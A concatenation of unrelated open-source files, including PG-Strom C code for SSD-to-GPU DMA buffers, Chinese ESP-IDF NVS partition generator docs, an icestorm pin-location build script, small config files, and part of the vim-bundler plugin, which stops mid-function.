dlist_init(&iomap_seg->free_chunks[j]); j = 0; mclass = IOMAPBUF_CHUNKSZ_MAX_BIT; remain = iomap_buffer_size; while (remain >= IOMAPBUF_CHUNKSZ_MIN && mclass >= IOMAPBUF_CHUNKSZ_MIN_BIT) { IOMapBufferChunk *iomap_chunk = &iomap_seg->iomap_chunks[j]; Size chunk_sz = (1UL << mclass); if (remain < chunk_sz) mclass--; else { iomap_chunk->mclass = mclass; dlist_push_tail(&iomap_seg->free_chunks[mclass], &iomap_chunk->free_chain); remain -= chunk_sz; j += (chunk_sz >> IOMAPBUF_CHUNKSZ_MIN_BIT); } } pg_memory_barrier(); /* * iomap_seg->iomap_handle != 0 indicates the i/o mapped device * memory is now ready to use. So, we have to put the @handle * last. Order shall be guaranteed with memory barrier. */ iomap_seg->iomap_handle = cmd.handle; pos += SizeOfIOMapBufferSegment; } /* * Loop forever */ for (;;) { ResetLatch(MyLatch); CHECK_FOR_INTERRUPTS(); /* * TODO: It may be a good idea to have a health check of i/o mapped * device memory. */ ev = WaitLatch(MyLatch, WL_LATCH_SET | WL_TIMEOUT | WL_POSTMASTER_DEATH, 60 * 1000); /* wake up per minutes */ /* Emergency bailout if postmaster has died. */ if (ev & WL_POSTMASTER_DEATH) exit(1); } } /* * pgstrom_startup_nvme_strom */ static void pgstrom_startup_nvme_strom(void) { Size required; bool found; struct stat stbuf; if (shmem_startup_next) (*shmem_startup_next)(); /* is nvme-strom driver installed? */ if (stat(nvme_strom_ioctl_pathname, &stbuf) != 0) ereport(ERROR, (errcode(ERRCODE_FEATURE_NOT_SUPPORTED), errmsg("failed on stat(2) for %s: %m", nvme_strom_ioctl_pathname), errhint("nvme-strom.ko may not be installed on the system"))); /* allocation of static shared memory */ required = SizeOfIOMapBufferSegment * numDevAttrs, iomap_buffer_segments = ShmemInitStruct("iomap_buffer_segments", required, &found); if (found) elog(FATAL, "Bug? \"iomap_buffer_segments\" is already initialized"); memset(iomap_buffer_segments, 0, required); } /* * pgstrom_init_nvme_strom */ void pgstrom_init_nvme_strom(void) { static int __iomap_buffer_size; Size shared_buffer_size = (Size)NBuffers * (Size)BLCKSZ; Size max_nchunks; Size required; BackgroundWorker worker; /* pg_strom.iomap_buffer_size */ DefineCustomIntVariable("pg_strom.iomap_buffer_size", "I/O mapped buffer size for SSD-to-GPU P2P DMA", NULL, &__iomap_buffer_size, 0, 0, INT_MAX, PGC_POSTMASTER, GUC_NOT_IN_SAMPLE | GUC_UNIT_KB, NULL, NULL, NULL); iomap_buffer_size = (Size)__iomap_buffer_size << 10; if (iomap_buffer_size % IOMAPBUF_CHUNKSZ_MIN != 0) elog(ERROR, "pg_strom.iomap_buffer_size is not aligned to 4KB"); /* pg_strom.nvme_strom_enabled */ DefineCustomBoolVariable("pg_strom.nvme_strom_enabled", "Turn on/off SSD-to-GPU P2P DMA", NULL, &nvme_strom_enabled, true, PGC_SUSET, GUC_NOT_IN_SAMPLE, NULL, NULL, NULL); /* pg_strom.debug_force_nvme_strom */ DefineCustomBoolVariable("pg_strom.debug_force_nvme_strom", "(DEBUG) force to use raw block scan mode", NULL, &debug_force_nvme_strom, false, PGC_SUSET, GUC_NOT_IN_SAMPLE, NULL, NULL, NULL); /* * MEMO: Threshold of table's physical size to use NVMe-Strom: * ((System RAM size) - * (shared_buffer size)) * 0.67 + (shared_buffer size) * * If table size is enough large to issue real i/o, NVMe-Strom will * make advantage by higher i/o performance. */ sysconf_pagesize = sysconf(_SC_PAGESIZE); if (sysconf_pagesize < 0) elog(ERROR, "failed on sysconf(_SC_PAGESIZE): %m"); sysconf_phys_pages = sysconf(_SC_PHYS_PAGES); if (sysconf_phys_pages < 0) elog(ERROR, "failed on sysconf(_SC_PHYS_PAGES): %m"); if (sysconf_pagesize * sysconf_phys_pages < shared_buffer_size) elog(ERROR, "Bug? shared_buffer is larger than system RAM"); nvme_strom_threshold = ((sysconf_pagesize * sysconf_phys_pages - shared_buffer_size) * 2 / 3 + shared_buffer_size) / BLCKSZ; /* * i/o mapped device memory shall be set up * only when pg_strom.iomap_device_memory_size > 0. */ if (iomap_buffer_size > 0) { max_nchunks = iomap_buffer_size / IOMAPBUF_CHUNKSZ_MIN; required = offsetof(IOMapBufferSegment, iomap_chunks[max_nchunks]); RequestAddinShmemSpace(MAXALIGN(required) * numDevAttrs); shmem_startup_next = shmem_startup_hook; shmem_startup_hook = pgstrom_startup_nvme_strom; /* also needs CUDA resource owner */ memset(&worker, 0, sizeof(BackgroundWorker)); snprintf(worker.bgw_name, sizeof(worker.bgw_name), "NVMe-Strom I/O Mapped Buffer"); worker.bgw_flags = BGWORKER_SHMEM_ACCESS; worker.bgw_start_time = BgWorkerStart_PostmasterStart; worker.bgw_restart_time = BGW_NEVER_RESTART; worker.bgw_main = iomap_buffer_owner_main; RegisterBackgroundWorker(&worker); } }
{ "pile_set_name": "Github" }
#include "ofMain.h" #include "ofApp.h" #include "ofAppGlutWindow.h" //======================================================================== int main( ){ ofAppGlutWindow window; ofSetupOpenGL(&window, 1024,768, OF_WINDOW); // <-------- setup the GL context // this kicks off the running of my app // can be OF_WINDOW or OF_FULLSCREEN // pass in width and height too: ofRunApp( new ofApp()); }
{ "pile_set_name": "Github" }
10 dir 525538 http://[email protected]/weichuncai/trunk/lang http://[email protected] 2012-02-10T17:33:09.140533Z 503287 lmyoaoa b8457f37-d9ea-0310-8a92-e5e31aec5664 weichuncai-en_US.mo file 2012-03-31T06:30:09.000000Z 09d41686f8760d9798c6151f5317fae5 2012-02-10T17:33:09.140533Z 503287 lmyoaoa has-props 4027 weichuncai-en_US.po file 2012-03-31T06:30:09.000000Z c8a041472b230e09ee5df591425226cf 2012-02-10T17:33:09.140533Z 503287 lmyoaoa 6746
{ "pile_set_name": "Github" }
NVS 分区生成程序 =============================== :link_to_translation:`en:[English]` 介绍 ------------ NVS 分区生成程序 (:component_file:`nvs_flash/nvs_partition_generator/nvs_partition_gen.py`) 根据 CSV 文件中的键值对生成二进制文件。该二进制文件与 :doc:`非易失性存储器 (NVS) </api-reference/storage/nvs_flash>` 中定义的 NVS 结构兼容。NVS 分区生成程序适合用于生成二进制数据(Blob),其中包括设备生产时可从外部烧录的 ODM/OEM 数据。这也使得生产制造商在使用同一个固件的基础上,通过自定义参数,如序列号等,为每个设备生成不同配置。 准备工作 ------------- 在加密模式下使用该程序,需安装下列软件包: - cryptography package 根目录下的 `requirements.txt` 包含必需 python 包,请预先安装。 CSV 文件格式 --------------- .csv 文件每行需包含四个参数,以逗号隔开。具体参数描述见下表: +------+----------+--------------------------------------------------------------+-----------------------------------------------------------------+ | 序号 | 参数 | 描述 | 说明 | +======+==========+==============================================================+=================================================================+ | 1 | Key | 主键,应用程序可通过查询此键来获取数据。 | | +------+----------+--------------------------------------------------------------+-----------------------------------------------------------------+ | 2 | Type | 支持 ``file``、``data`` 和 ``namespace``。 | | +------+----------+--------------------------------------------------------------+-----------------------------------------------------------------+ | 3 | Encoding | 支持 ``u8``、``i8``、``u16``、``u32``、 | ``file`` | | | | ``i32``、``string``、``hex2bin``、``base64`` 和 ``binary``。 | 类型当前仅支持 | | | | 决定二进制 ``bin`` 文件中 value 被编码成的类型。 | ``hex2bin``、``base64``、 | | | | ``string`` 和 ``binary`` 编码的区别在于, | ``string`` 和 ``binary`` 编码。 | | | | ``string`` 数据以 NULL 字符结尾,``binary`` 数据则不是。 | | +------+----------+--------------------------------------------------------------+-----------------------------------------------------------------+ | 4 | Value | Data value | ``namespace`` 字段的 ``encoding`` 和 ``value`` 应为空。 | | | | | ``namespace`` 的 ``encoding`` 和 ``value`` 为固定值,不可设置。 | | | | | 这些单元格中的所有值都会被忽视。 | +------+----------+--------------------------------------------------------------+-----------------------------------------------------------------+ .. note:: CSV 文件的第一行应为列标题,不可设置。 此类 CSV 文件的 Dump 示例如下:: key,type,encoding,value <-- 列标题 namespace_name,namespace,, <-- 第一个条目为 "namespace" key1,data,u8,1 key2,file,string,/path/to/file .. note:: 请确保: - 逗号 ',' 前后无空格; - CSV 文件每行末尾无空格。 NVS 条目和命名空间 (namespace) ----------------------------------- 如 CSV 文件中出现命名空间条目,后续条目均会被视为该命名空间的一部分,直至找到下一个命名空间条目。找到新命名空间条目后,后续所有条目都会被视为新命名空间的一部分。 .. note:: CSV 文件中第一个条目应始终为 ``namespace``。 支持多页 Blob ---------------------- 默认情况下,二进制 Blob 可跨多页,格式参考 :ref:`structure_of_entry` 章节。如需使用旧版格式,可在程序中禁用该功能。 支持加密 ------------------- NVS 分区生成程序还可使用 AES-XTS 加密生成二进制加密文件。更多信息详见 :ref:`nvs_encryption`。 支持解密 ------------------- 如果 NVS 二进制文件采用了 AES-XTS 加密,该程序还可对此类文件进行解密,更多信息详见 :ref:`nvs_encryption`。 运行程序 ------------------- **使用方法**:: python nvs_partition_gen.py [-h] {generate,generate-key,encrypt,decrypt} ... **可选参数**: +------+------------+----------------------+ | 序号 | 参数 | 描述 | +------+------------+----------------------+ | 1 | -h, --help | 显示帮助信息并退出 | +------+------------+----------------------+ **命令**:: 运行 nvs_partition_gen.py {command} -h 查看更多帮助信息 +------+--------------+---------------+ | 序号 | 参数 | 描述 | +------+--------------+---------------+ | 1 | generate | 生成 NVS 分区 | +------+--------------+---------------+ | 2 | generate-key | 生成加密密钥 | +------+--------------+---------------+ | 3 | encrypt | 加密 NVS 分区 | +------+--------------+---------------+ | 4 | decrypt | 解密 NVS 分区 | +------+--------------+---------------+ 生成 NVS 分区(默认模式) ---------------------------------- **使用方法**:: python nvs_partition_gen.py generate [-h] [--version {1,2}] [--outdir OUTDIR] input output size **位置参数**: +--------+--------------------------------------------------+ | 参数 | 描述 | +--------+--------------------------------------------------+ | input | 待解析的 CSV 文件路径 | +--------+--------------------------------------------------+ | output | NVS 二进制文件的输出路径 | +--------+--------------------------------------------------+ | size | NVS 分区大小(以字节为单位,且为 4096 的整数倍) | +--------+--------------------------------------------------+ **可选参数**: +-----------------+------------------------------------------------+ | 参数 | 描述 | +-----------------+------------------------------------------------+ | -h, --help | 显示帮助信息并退出 | +-----------------+------------------------------------------------+ | --version {1,2} | - 设置多页 Blob 版本。 | | | - 版本 1:禁用多页 Blob; | | | - 版本 2:启用多页 Blob; | | | - 默认版本:版本 2。 | +-----------------+------------------------------------------------+ | --outdir OUTDIR | 输出目录,用于存储创建的文件。(默认当前目录) | +-----------------+------------------------------------------------+ 运行如下命令创建 NVS 分区,该程序同时会提供 CSV 示例文件:: python nvs_partition_gen.py generate sample_singlepage_blob.csv sample.bin 0x3000 仅生成加密密钥 ----------------------- **使用方法**:: python nvs_partition_gen.py generate-key [-h] [--keyfile KEYFILE] [--outdir OUTDIR] **可选参数**: +-------------------+------------------------------------------------+ | 参数 | 描述 | +-------------------+------------------------------------------------+ | -h, --help | 显示帮助信息并退出 | +-------------------+------------------------------------------------+ | --keyfile KEYFILE | 加密密钥文件的输出路径 | +-------------------+------------------------------------------------+ | --outdir OUTDIR | 输出目录,用于存储创建的文件。(默认当前目录) | +-------------------+------------------------------------------------+ 运行以下命令仅生成加密密钥:: python nvs_partition_gen.py generate-key 生成 NVS 加密分区 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **使用方法**:: python nvs_partition_gen.py encrypt [-h] [--version {1,2}] [--keygen] [--keyfile KEYFILE] [--inputkey INPUTKEY] [--outdir OUTDIR] input output size **位置参数**: +--------+--------------------------------------+ | 参数 | 描述 | +--------+--------------------------------------+ | input | 待解析 CSV 文件的路径 | +--------+--------------------------------------+ | output | NVS 二进制文件的输出路径 | +--------+--------------------------------------+ | size | NVS 分区大小 | | | (以字节为单位,且为 4096 的整数倍) | +--------+--------------------------------------+ **可选参数**: +---------------------+------------------------------+ | 参数 | 描述 | +---------------------+------------------------------+ | -h, --help | 显示帮助信息并退出 | +---------------------+------------------------------+ | --version {1,2} | - 设置多页 Blob 版本。 | | | - 版本 1:禁用多页 Blob; | | | - 版本 2:启用多页 Blob; | | | - 默认版本:版本 2。 | +---------------------+------------------------------+ | --keygen | 生成 NVS 分区加密密钥 | +---------------------+------------------------------+ | --keyfile KEYFILE | 密钥文件的输出路径 | +---------------------+------------------------------+ | --inputkey INPUTKEY | 内含 NVS 分区加密密钥的文件 | +---------------------+------------------------------+ | --outdir OUTDIR | 输出目录,用于存储创建的文件 | | | (默认当前目录) | +---------------------+------------------------------+ 运行以下命令加密 NVS 分区,该程序同时会提供一个 CSV 示例文件。 - 通过 NVS 分区生成程序生成加密密钥来加密:: python nvs_partition_gen.py encrypt sample_singlepage_blob.csv sample_encr.bin 0x3000 --keygen .. note:: 创建的加密密钥格式为 ``<outdir>/keys/keys-<timestamp>.bin``。 - 通过 NVS 分区生成程序生成加密密钥,并将密钥存储于自定义的文件中:: python nvs_partition_gen.py encrypt sample_singlepage_blob.csv sample_encr.bin 0x3000 --keygen --keyfile sample_keys.bin .. note:: 创建的加密密钥格式为 ``<outdir>/keys/keys-<timestamp>.bin``。 .. note:: 加密密钥存储于新建文件的 ``keys/`` 目录下,与 NVS 密钥分区结构兼容。更多信息请参考 :ref:`nvs_key_partition`。 - 将加密密钥用作二进制输入文件来进行加密:: python nvs_partition_gen.py encrypt sample_singlepage_blob.csv sample_encr.bin 0x3000 --inputkey sample_keys.bin 解密 NVS 分区 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **使用方法**:: python nvs_partition_gen.py decrypt [-h] [--outdir OUTDIR] input key output **位置参数**: +--------+-------------------------------+ | 参数 | 描述 | +--------+-------------------------------+ | input | 待解析的 NVS 加密分区文件路径 | +--------+-------------------------------+ | key | 含有解密密钥的文件路径 | +--------+-------------------------------+ | output | 已解密的二进制文件输出路径 | +--------+-------------------------------+ **可选参数**: +-----------------+------------------------------+ | 参数 | 描述 | +-----------------+------------------------------+ | -h, --help | 显示帮助信息并退出 | +-----------------+------------------------------+ | --outdir OUTDIR | 输出目录,用于存储创建的文件 | | | (默认当前目录) | +-----------------+------------------------------+ 运行以下命令解密已加密的 NVS 分区:: python nvs_partition_gen.py decrypt sample_encr.bin sample_keys.bin sample_decr.bin 您可以自定义格式版本号: - 版本 1:禁用多页 Blob - 版本 2:启用多页 Blob 版本 1:禁用多页 Blob ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 如需禁用多页 Blob,请按照如下命令将版本参数设置为 1,以此格式运行分区生成程序。该程序同时会提供一个 CSV 示例文件:: python nvs_partition_gen.py generate sample_singlepage_blob.csv sample.bin 0x3000 --version 1 版本 2:启用多页 Blob ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 如需启用多页 Blob,请按照如下命令将版本参数设置为 2,以此格式运行分区生成程序。该程序同时会提供一个 CSV 示例文件:: python nvs_partition_gen.py generate sample_multipage_blob.csv sample.bin 0x4000 --version 2 .. note:: NVS 分区最小为 0x3000 字节。 .. note:: 将二进制文件烧录至设备时,请确保与应用的 sdkconfig 设置一致。 说明 ------- - 分区生成程序不会对重复键进行检查,而将数据同时写入这两个重复键中。请注意不要使用同名的键; - 新页面创建后,前一页的空白处不会再写入数据。CSV 文件中的字段须按次序排列以优化内存; - 暂不支持 64 位数据类型。
{ "pile_set_name": "Github" }
#!/bin/bash mkdir -p pinloc-4k-cm81 cd pinloc-4k-cm81 pins=" A1 A2 A3 A4 A6 A7 A8 A9 B1 B2 B3 B4 B5 B6 B7 B8 B9 C1 C2 C3 C4 C5 C9 D1 D2 D3 D5 D6 D7 D8 D9 E1 E2 E3 E4 E5 E7 E8 F1 F3 F7 F8 G1 G2 G3 G4 G5 G6 G7 G8 G9 H1 H2 H4 H5 H7 H9 J1 J2 J3 J4 J8 J9 " if [ $(echo $pins | wc -w) -ne 63 ]; then echo "Incorrect number of pins:" $(echo $pins | wc -w) exit 1 fi { echo -n "all:" for pin in $pins; do id="pinloc-4k-cm81_${pin}" echo -n " ${id}.exp" done echo for pin in $pins; do id="pinloc-4k-cm81_${pin}" echo "module top(output y); assign y = 0; endmodule" > ${id}.v echo "set_io y ${pin}" >> ${id}.pcf echo; echo "${id}.exp:" echo " ICEDEV=lp4k-cm81 bash ../../icecube.sh ${id} > ${id}.log 2>&1" echo " ../../../icebox/icebox_explain.py ${id}.asc > ${id}.exp.new" echo " ! grep '^Warning: pin' ${id}.log" echo " rm -rf ${id}.tmp" echo " mv ${id}.exp.new ${id}.exp" done } > pinloc-4k-cm81.mk set -ex make -f pinloc-4k-cm81.mk -j4 python3 ../pinlocdb.py pinloc-4k-cm81_*.exp > ../pinloc-4k-cm81.txt
{ "pile_set_name": "Github" }
{ "parent": "item/generated", "textures": { "layer0": "gregtech:items/material_sets/fine/crushed_centrifuged" } }
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <menu xmlns:android="http://schemas.android.com/apk/res/android" xmlns:app="http://schemas.android.com/apk/res-auto" xmlns:tools="http://schemas.android.com/tools"> <item android:id="@+id/update_opponents_list" android:icon="@drawable/ic_refresh" android:title="@string/action_update_opponens_list" app:showAsAction="always" tools:ignore="AlwaysShowAction" /> <item android:id="@+id/settings" android:title="@string/action_settings" app:showAsAction="never" /> <item android:id="@+id/log_out" android:title="@string/action_logout" app:showAsAction="never" /> <item android:id="@+id/appinfo" android:title="@string/action_dialogs_app_info" app:showAsAction="never" /> </menu>
{ "pile_set_name": "Github" }
/* Copyright (C) 2014 The gtkmm Development Team * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library. If not, see <http://www.gnu.org/licenses/>. */ #include <gtk/gtk.h>
{ "pile_set_name": "Github" }
" bundler.vim - Support for Ruby's Bundler " Maintainer: Tim Pope <http://tpo.pe/> " Version: 2.1 if exists('g:loaded_bundler') || &cp || v:version < 700 finish endif let g:loaded_bundler = 1 if !exists('g:dispatch_compilers') let g:dispatch_compilers = {} endif let g:dispatch_compilers['bundle exec'] = '' " Section: Utility function! s:function(name) abort return function(substitute(a:name,'^s:',matchstr(expand('<sfile>'), '<SNR>\d\+_'),'')) endfunction function! s:sub(str,pat,rep) abort return substitute(a:str,'\v\C'.a:pat,a:rep,'') endfunction function! s:gsub(str,pat,rep) abort return substitute(a:str,'\v\C'.a:pat,a:rep,'g') endfunction function! s:shellesc(arg) abort if a:arg =~# '^[A-Za-z0-9_/.-]\+$' return a:arg else return shellescape(a:arg) endif endfunction function! s:fnameescape(file) abort if exists('*fnameescape') return fnameescape(a:file) else return escape(a:file," \t\n*?[{`$\\%#'\"|!<") endif endfunction function! s:shellslash(path) abort if exists('+shellslash') && !&shellslash return s:gsub(a:path,'\\','/') else return a:path endif endfunction function! s:fcall(fn, path, ...) abort let ns = matchstr(a:path, '^\a\a\+\ze:') if len(ns) && exists('*' . ns . '#' . a:fn) return call(ns . '#' . a:fn, [a:path] + a:000) else return call(a:fn, [a:path] + a:000) endif endfunction function! s:filereadable(path) abort return s:fcall('filereadable', a:path) endfunction function! s:completion_filter(results,A) abort let results = sort(copy(a:results)) call filter(results,'v:val !~# "\\~$"') let filtered = filter(copy(results),'v:val[0:strlen(a:A)-1] ==# a:A') if !empty(filtered) | return filtered | endif let regex = s:gsub(a:A,'[^/:]','[&].*') let filtered = filter(copy(results),'v:val =~# "^".regex') if !empty(filtered) | return filtered | endif let filtered = filter(copy(results),'"/".v:val =~# "[/:]".regex') if !empty(filtered) | return filtered | endif let regex = s:gsub(a:A,'.','[&].*') let filtered = filter(copy(results),'"/".v:val =~# regex') return filtered endfunction function! s:throw(string) abort let v:errmsg = 'bundler: '.a:string throw v:errmsg endfunction function! s:warn(str) abort echohl WarningMsg echomsg a:str echohl None let v:warningmsg = a:str endfunction function! s:add_methods(namespace, method_names) abort for name in a:method_names let s:{a:namespace}_prototype[name] = s:function('s:'.a:namespace.'_'.name) endfor endfunction let s:commands = [] function! s:command(definition) abort let s:commands += [a:definition] endfunction function! s:define_commands() abort for command in s:commands exe 'command! -buffer '.command endfor endfunction augroup bundler_utility autocmd! autocmd User Bundler call s:define_commands() augroup END let s:abstract_prototype = {} " Section: Syntax highlighting function! s:syntaxfile() abort syntax keyword rubyGemfileMethod gemspec gem source path git group platform platforms env ruby hi def link rubyGemfileMethod rubyInclude endfunction function! s:syntaxlock() abort setlocal iskeyword+=-,. syn match gemfilelockHeading '^[[:upper:] ]\+$' syn match gemfilelockKey '^\s\+\zs\S\+:'he=e-1 skipwhite nextgroup=gemfilelockRevision syn match gemfilelockKey 'remote:'he=e-1 skipwhite nextgroup=gemfilelockRemote syn match gemfilelockRemote '\S\+' contained syn match gemfilelockRevision '[[:alnum:]._-]\+$' contained syn match gemfilelockGem '^\s\+\zs[[:alnum:]._-]\+\%([ !]\|$\)\@=' contains=gemfilelockFound,gemfilelockMissing skipwhite nextgroup=gemfilelockVersions,gemfilelockBang syn match gemfilelockVersions '([^()]*)' contained contains=gemfilelockVersion syn match gemfilelockVersion '[^,()]*' contained syn match gemfilelockBang '!' contained if !empty(bundler#project()) exe 'syn match gemfilelockFound "\<\%(bundler\|' . join(keys(s:project().paths()), '\|') . '\)\>" contained' exe 'syn match gemfilelockMissing "\<\%(' . join(filter(keys(s:project().versions()), '!has_key(s:project().paths(), v:val)'), '\|') . '\)\>" contained' else exe 'syn match gemfilelockFound "\<\%(\S*\)\>" contained' endif syn match gemfilelockHeading '^PLATFORMS$' nextgroup=gemfilelockPlatform skipnl skipwhite syn match gemfilelockPlatform '^ \zs[[:alnum:]._-]\+$' contained nextgroup=gemfilelockPlatform skipnl skipwhite hi def link gemfilelockHeading PreProc hi def link gemfilelockPlatform Typedef hi def link gemfilelockKey Identifier hi def link gemfilelockRemote String hi def link gemfilelockRevision Number hi def link gemfilelockFound Statement hi def link gemfilelockMissing Error hi def link gemfilelockVersion Type hi def link gemfilelockBang Special endfunction function! s:setuplock() abort setlocal includeexpr=get(bundler#project().gems(),v:fname,v:fname) setlocal suffixesadd=/ cnoremap <buffer><expr> <Plug><cfile> get(bundler#project().gems(),expand("<cfile>"),"\022\006") let pattern = '^$\|Rails' if mapcheck('gf', 'n') =~# pattern nnoremap <silent><buffer> gf :Bopen <C-R><C-F><CR> endif if mapcheck('<C-W>f', 'n') =~# pattern nnoremap <silent><buffer> <C-W>f :Bsplit <C-R><C-F><CR> endif if mapcheck('<C-W><C-F>', 'n') =~# pattern nnoremap <silent><buffer> <C-W><C-F> :Bsplit <C-R><C-F><CR> endif if mapcheck('<C-W>gf', 'n') =~# pattern nnoremap <silent><buffer> <C-W>gf :Btabedit <C-R><C-F><CR> endif endfunction augroup bundler_syntax autocmd! autocmd BufNewFile,BufRead */.bundle/config set filetype=yaml autocmd BufNewFile,BufRead Gemfile,gems.rb \ if &filetype !=# 'ruby' | setf ruby | endif autocmd Syntax ruby \ if expand('<afile>:t') ==? 'gemfile' | call s:syntaxfile() | endif autocmd BufNewFile,BufRead [Gg]emfile.lock,gems.locked setf gemfilelock autocmd FileType gemfilelock set suffixesadd=.rb autocmd Syntax gemfilelock call s:syntaxlock() autocmd FileType gemfilelock call s:setuplock() autocmd User Rails/Gemfile.lock,Rails/gems.locked call s:setuplock() augroup END " Section: Initialization function! s:FindBundlerLock(path) abort let path = s:shellslash(a:path) let fn = fnamemodify(path,':s?[\/]$??') let ofn = "" let nfn = fn while fn !=# ofn && fn !=# '.' if s:filereadable(fn . '/Gemfile.lock') && s:filereadable(fn . '/Gemfile') return s:sub(fnamemodify(fn,':p'), '[\\/]=$', '/Gemfile.lock') elseif s:filereadable(fn . '/gems.locked') && s:filereadable(fn . '/gems.rb') return s:sub(fnamemodify(fn,':p'), '[\\/]=$', '/gems.locked') endif let ofn = fn let fn = fnamemodify(ofn,':h') endwhile return '' endfunction function! s:Detect(path) abort if !exists('b:bundler_lock') let lock = s:FindBundlerLock(a:path) if !empty(lock) let b:bundler_lock = lock unlet! b:bundler_gem elseif !empty(getbufvar('#', 'bundler_lock')) let lock = getbufvar('#', 'bundler_lock') for [gem, path] in items(s:project(lock).paths()) if strpart(a:path, 0, len(path)) ==# path let b:bundler_lock = lock let b:bundler_gem = gem break endif endfor endif endif return exists('b:bundler_lock') endfunction function! s:Setup(path) abort if s:Detect(a:path) silent doautocmd User Bundler endif endfunction function! s:ProjectionistDetect() abort if s:Detect(get(g:, 'projectionist_file', '')) && !exists('b:bundler_gem') let dir = fnamemodify(b:bundler_lock, ':h') call projectionist#append(dir, { \ '*': s:filereadable(dir . '/config/environment.rb') ? {} : \ {'console': 'bundle console'}, \ 'Gemfile': {'dispatch': 'bundle --gemfile={file}', 'alternate': 'Gemfile.lock'}, \ 'gems.rb': {'dispatch': 'bundle --gemfile={file}', 'alternate': 'gems.locked'}, \ 'gems.locked': {'alternate': 'gems.rb'}, \ 'Gemfile.lock': {'alternate': 'Gemfile'}}) for projections in bundler#project().projections_list() call projectionist#append(fnamemodify(b:bundler_lock, ':h'), projections) endfor endif endfunction augroup bundler autocmd! autocmd FileType * call s:Setup(expand('<afile>:p')) autocmd BufNewFile,BufReadPost * \ if empty(&filetype) | \ call s:Setup(expand('<afile>:p')) | \ endif autocmd User ProjectionistDetect call s:ProjectionistDetect() autocmd User ProjectionistActivate \ if exists('b:bundler_lock') && !exists(':Bopen') | \ silent doautocmd User Bundler | \ endif augroup END " Section: Project let s:project_prototype = {} let s:projects = {} function! bundler#project(...) abort if !a:0 let lock = !empty(get(b:, 'bundler_lock', '')) ? b:bundler_lock : s:FindBundlerLock(expand('%:p')) elseif s:filereadable(a:1 . '/Gemfile.lock') let lock = a:1 . '/Gemfile.lock' elseif s:filereadable(a:1 . '/gems.locked') let lock = a:1 . '/gems.locked' elseif s:filereadable(a:1) let lock = a:1 else let lock = '' endif if !empty(lock) if has_key(s:projects, lock) let project = get(s:projects, lock) else let project = {'root': fnamemodify(lock, ':h'), '_lock': lock} let s:projects[lock] = project endif return extend(extend(project,s:project_prototype,'keep'),s:abstract_prototype,'keep') endif return {} endfunction function! s:project(...) abort let project = a:0 ? bundler#project(a:1) : bundler#project() if empty(project) call s:throw('not a Bundler project: '.(a:0 ? a:1 : expand('%'))) else return project endif endfunction function! s:project_real(...) dict abort let path = join([self.root]+a:000,'/') let pre = substitute(matchstr(path, '^\a\a\+\ze:'), '^\a', '\u&', 'g') if len(pre) && exists('*' . pre . 'Real') return call(pre . 'Real', [path]) elseif len(pre) && exists('*' . pre . 'Path') return call(pre . 'Path', [path]) else return resolve(path) endif endfunction function! s:project_lock() dict abort return self._lock endfunction function! s:project_manifest() dict abort return substitute(substitute(self._lock, '\.locked$', '.rb', ''), '\.lock$', '', '') endfunction call s:add_methods('project',['real', 'lock', 'manifest']) function! s:project_locked() dict abort let lock_file = self.lock() let time = s:fcall('getftime', lock_file) if time != -1 && time != get(self,'_lock_time',-1) let self._locked = {'git': [], 'gem': [], 'path': []} let self._versions = {} let self._dependencies = {} let section = '' let conflict = 0 for line in s:fcall('readfile', lock_file) if line =~# '^[=|]' let conflict = 1 continue elseif line =~# '^>' let conflict = 0 continue elseif line =~# '^<' || conflict continue elseif line =~# '^\S' let section = tr(tolower(line), ' ', '_') let properties = {'versions': {}} if type(get(self._locked, section)) ==# type([]) call extend(self._locked[section], [properties]) endif elseif line =~# '^ \w\+: ' let properties[matchstr(line, '\w\+')] = matchstr(line, ': \zs.*') elseif line =~# '^ [a-zA-Z0-9._-]\+\s\+(\d\+' let name = split(line, ' ')[0] let ver = substitute(line, '.*(\|).*', '', 'g') let properties.versions[name] = ver let self._versions[name] = ver let self._dependencies[name] = [] elseif line =~# '^ [a-zA-Z0-9._-]\+\s\+(' let dep = split(line, ' ')[0] call add(self._dependencies[name], dep) elseif line =~# '^ \S' && !has_key(self._locked, section) let self._locked[section] = line[3:-1] endif endfor let self._lock_time = time endif return get(self, '_locked', {}) endfunction function! s:project_paths(...) dict abort call self.locked() let time = get(self, '_lock_time', -1) if a:0 && a:1 ==# 'refresh' || time != -1 && time != get(self, '_path_time', -1) let paths = {} let chdir = exists("*haslocaldir") && haslocaldir() ? "lchdir" : "chdir" let cwd = getcwd() " Explicitly setting $PATH means /etc/zshenv on OS X can't touch it. if executable('env') let prefix = 'env PATH='.s:shellesc($PATH).' ' else let prefix = '' endif let gem_paths = [] if exists('$GEM_PATH') let gem_paths = split($GEM_PATH, has('win32') ? ';' : ':') endif try exe chdir s:fnameescape(self.real()) if empty(gem_paths) let gem_paths = split(system(prefix.'ruby -rrbconfig -rrubygems -e '.s:shellesc('print(([RbConfig::CONFIG["ruby_version"]] + Gem.path).join(%(;)))')), ';') let abi_version = empty(gem_paths) ? '' : remove(gem_paths, 0) else let abi_version = system(prefix.'ruby -rrbconfig -e '.s:shellesc('print RbConfig::CONFIG["ruby_version"]')) endif exe chdir s:fnameescape(cwd) finally exe chdir s:fnameescape(cwd) endtry for config in [expand('~/.bundle/config'), self.real('.bundle/config')] if filereadable(config) let body = join(readfile(config), "\n") let bundle_path = matchstr(body, "\\C\\<BUNDLE_PATH: [\"']\\=\\zs[^\n'\"]*") if !empty(bundle_path) let gem_paths = [self.real(bundle_path, 'ruby', abi_version), self.real(bundle_path)] endif endif endfor call map(gem_paths, 'resolve(v:val)') for source in self._locked.git let basename = matchstr(source.remote, '.*/\zs.\{-\}\ze\%(\.git\)\=$') . \ '-' . source.revision[0:11] for [name, ver] in items(source.versions) for path in map(copy(gem_paths), 'v:val . "/bundler/gems"') + \ [expand('~/.bundle/ruby/') . abi_version] let dir = path . '/' . basename if 